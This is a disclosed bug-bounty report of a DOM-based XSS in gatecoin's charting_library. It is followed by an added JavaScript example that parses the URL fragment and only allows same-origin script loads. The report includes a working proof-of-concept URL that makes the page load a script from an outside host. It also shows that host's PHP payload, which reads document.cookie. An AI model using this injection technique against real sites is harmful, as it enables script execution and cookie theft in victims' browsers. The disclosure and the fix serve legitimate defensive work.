DOM Based XSS charting_library

Disclosed: 2018-10-19 07:53:26 By bobrov To gatecoin
Medium
Vulnerability Details
**Description**

charting_library contains a DOM Based XSS vulnerability that allows loading an external JS script and executing it.

**PoC**

Open the URL in any browser:

```
https://gatecoin.com/widget-trade/assets/charting_library/static/tv-chart.html#indicatorsFile=//blackfan.ru/tv-chart-poc&disabledFeatures=[]&enabledFeatures=[]
```

**Vulnerable script**

https://gatecoin.com/widget-trade/assets/charting_library/static/bundles/library.js

**Vulnerable code**

```js
$.getScript(urlParams.indicatorsFile)
```

blackfan.ru/tv-chart-poc source:

```php
<?php
header("Access-Control-Allow-Origin: *");
header("Access-Control-Allow-Headers: cache-control, X-Requested-With");
?>
alert(document.domain);
alert(document.cookie);
```

## Impact

DOM Based XSS
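The sink in the report takes `indicatorsFile` straight from the URL fragment and hands it to `$.getScript`, so a protocol-relative value such as `//blackfan.ru/tv-chart-poc` is resolved against the attacker's host and fetched from a foreign origin. The block below is an added example written for this page, not code from charting_library, gatecoin or the reporter. How tv-chart.html really parses `location.hash` and the function names are assumptions. It parses the fragment the way the PoC URL implies, resolves the parameter with the WHATWG URL parser against the page origin, and only lets a same-origin `http(s)` URL reach the script loader; the loader is passed in as a callback so the check runs without jQuery or a browser.

```javascript
// Added example for this page, not charting_library code. The hash parsing
// and the helper names are assumptions.

// Decode one percent-encoded component without throwing on malformed input.
function safeDecode(s) {
  try { return decodeURIComponent(s); } catch (e) { return s; }
}

// Parse "#a=1&b=2" into { a: '1', b: '2' }. This mirrors the urlParams object
// the vulnerable code reads from; the real parser may differ.
function parseHashParams(hash) {
  const params = {};
  const query = hash.startsWith('#') ? hash.slice(1) : hash;
  for (const pair of query.split('&')) {
    if (!pair) continue;
    const idx = pair.indexOf('=');
    const key = safeDecode(idx === -1 ? pair : pair.slice(0, idx));
    const value = idx === -1 ? '' : safeDecode(pair.slice(idx + 1));
    params[key] = value;
  }
  return params;
}

// Resolve a user-supplied script path against the page origin and accept it
// only if it stays on that origin over http(s). Protocol-relative values
// ("//blackfan.ru/x"), absolute foreign URLs, backslash variants
// ("\\evil/x", which the URL parser normalises to "//evil/x"), javascript:
// and data: URLs all fail the protocol or origin comparison.
function safeScriptUrl(value, pageOrigin) {
  if (typeof value !== 'string' || value === '') return null;
  let url;
  try {
    url = new URL(value, pageOrigin);   // relative paths resolve to pageOrigin
  } catch (e) {
    return null;                        // unparsable input
  }
  if (url.protocol !== 'https:' && url.protocol !== 'http:') return null;
  if (url.origin !== pageOrigin) return null;
  return url.href;
}

// Hardened replacement for `$.getScript(urlParams.indicatorsFile)`.
// `getScript` is injected so the logic can be exercised outside a browser;
// in the page it would be $.getScript. Returns the URL that was loaded, or
// null when the parameter was absent or rejected.
function loadIndicators(hash, pageOrigin, getScript) {
  const params = parseHashParams(hash);
  const url = safeScriptUrl(params.indicatorsFile, pageOrigin);
  if (url === null) return null;
  getScript(url);
  return url;
}

// Stand-alone demonstration with the PoC fragment from the report.
if (typeof require !== 'undefined' && require.main === module) {
  const poc = '#indicatorsFile=//blackfan.ru/tv-chart-poc&disabledFeatures=[]&enabledFeatures=[]';
  const result = loadIndicators(poc, 'https://gatecoin.com', (u) => console.log('loading', u));
  console.log('PoC parameter accepted:', result !== null);
}
```

The same-origin check stops the reported attack, but it still lets the fragment pick any script path on gatecoin.com; if that host serves user-controlled content anywhere, an allow-list of the known indicator files is the stricter fix.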
Report Stats
  • Report ID: 351275
  • State: Closed
  • Substate: resolved
  • Upvotes: 23